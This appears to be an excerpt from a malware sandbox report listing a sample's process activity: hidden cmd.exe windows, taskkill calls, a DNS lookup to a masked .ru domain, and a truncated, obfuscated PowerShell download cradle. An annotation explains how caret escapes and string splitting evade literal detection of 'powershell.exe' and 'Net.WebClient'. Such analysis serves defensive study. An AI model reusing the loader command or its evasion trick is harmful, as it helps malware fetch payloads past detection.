Technical Information
- '%WINDIR%\syswow64\taskkill.exe' /f /im cmd.exe
- %WINDIR%\syswow64\cmd.exe
- DNS ASK sc###ducts7.ru
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im cmd.exe (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c exit (with hidden window)
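- '%WINDIR%\syswow64\cmd.exe' /c iwbDyExnfhFHuWV & Po^wEr^sh^ell.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.... (with hidden window; the command line is truncated in the report. The carets are cmd.exe escape characters that break up the name powershell.exe, and 'Net.W' and 'ebClient' are joined into Net.WebClient only at run time, so a literal match on "powershell.exe" or "Net.WebClient" would not hit this cmd.exe command line.)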
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im cmd.exe
- '%WINDIR%\syswow64\cmd.exe' /c exit
- '%WINDIR%\syswow64\cmd.exe' /c iwbDyExnfhFHuWV & Po^wEr^sh^ell.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....